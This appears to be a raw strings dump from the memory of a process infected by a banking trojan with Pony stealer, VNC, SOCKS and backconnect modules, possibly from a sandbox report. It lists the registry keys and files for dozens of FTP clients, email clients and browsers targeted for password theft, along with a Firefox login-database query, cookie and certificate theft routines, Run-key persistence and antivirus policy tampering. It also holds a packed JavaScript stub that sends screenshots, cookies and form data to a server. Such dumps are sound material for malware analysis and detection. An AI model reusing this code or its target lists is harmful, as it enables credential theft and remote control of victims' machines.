NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
%System%\spoolsv.exe
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

imapi.exe_1780_rwx_00AB0000_0004E000:

%Documents and Settings%\All Users\Application Data\wzbrwgd.dat
.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
mozsqlite3.dll
sqlite3_open
sqlite3_close
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
FindCloseUrlCache
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
2)2.2;2~2
7 :(:1:7:
9.979`9}9
8-9G9Z9f9r9}9
.pdata
@.reloc
CRYPT32.dll
[%s - X64 EQ PID: %u TID: %u]
\SysWOW64\regsvr32.exe
[Pony] Fail create process: %u
[PONY] Fail inject to process: %u
s.dat
iexplore.exe
firefox.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

imapi.exe_1780_rwx_00D30000_00078000:

.text
.rdata
@.data
.reloc
t.Ht Hu%
_^SSSh8
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
USER32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
GDI32.dll
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l W(i){j.T=i;j.w=s;j.U=1;j.R=l(){p(x M===\'I\'){M=l(){A{k C H("N.F.6.0")}B(e){}A{k C H("N.F.3.0")}B(e){}A{k C H("N.F")}B(e){}A{k C H("17.F")}B(e){}k u}}k C M()};j.o=l(a,b,c,d){J f=j.R();J g=s;J h=j;G=(x(d)==\'I\')?u:q;b=\'/\' j.T \'/\' Z.18() \'/\' b;p(G==q){j.w=s;f.X=l(){A{p(f.Q==4){p(f.O!=P||f.z==\'-\'){h.w=u;p(x(d)=="l"){d(u)}}E{p(f.z==\' \'){h.w=q;p(x(d)=="l"){d(q)}}E{h.w=f.z;p(x(d)=="l"){d(f.z)}}}}}B(e){h.w=u;p(x(d)=="l"){d(u)}}}}f.19(a,b,G);f.1c(c);p(G==q){k q}A{p(f.Q==4&&f.O==P){p(f.z==\'-\'){k u}E{p(f.z==\' \'){k q}E{k f.z}}}k u}B(e){k u}};j.1e=l(){k j.w};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.Y=l(a,b){m=\'2/\' a;k j.o(\'y\',m,s,b)};j.14=l(a,b){m=\'3/\' a;k j.o(\'y\',m,s,b)};j.15=l(a){m=\'4/\';k j.o(\'y\',m,s,a)};j.16=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'y\',\'5/\' t \'/\' a,s,c)};j.1a=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1b=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=s;K=\'y\'}E{c=\'1d: \' c;K=\'v\'}k j.o(K,\'6/\' t \'/\' a,c,d)};j.L=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1f=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1g(a);k j.o(\'y\',m,s,d)};j.1h=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1i=l(a){m=\'10/\';k j.o(\'y\',m,s,a)};j.1j=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1k=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1l=l(a,b,c){m=\'13/\';L=a "\\r\\n" b;k j.o(\'v\',m,L,c)}};',62,84,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||false|POST|_LastAsync|typeof|GET|responseText|try|catch|new||else|XMLHTTP|Async|ActiveXObject|undefined|var|Type|Post|XMLHttpRequest|Msxml2|status|200|readyState|GetXHR||_Key|Version|SetVal|EQFramework|onreadystatechange|GetVal|Math|||||DelVal|ClearVals|GetServer|Microsoft|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm'.split('|'),0,{}));
CertificateAuthority
%s.pfx
cookies.sqlite
\Mozilla\Firefox\Profiles\
cookies.sqlite-journal
\Google\Chrome\User Data\Default\Cookies
chrome/Cookies
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
login=%s&pass=%s
/viewforum.php?f=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=reply&f=%u&t=%u&sid=%0.8X%0.8X%0.8X%0.8X
/posting.php?mode=post&f=%u&sid=%0.8X%0.8X%0.8X%0.8X
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
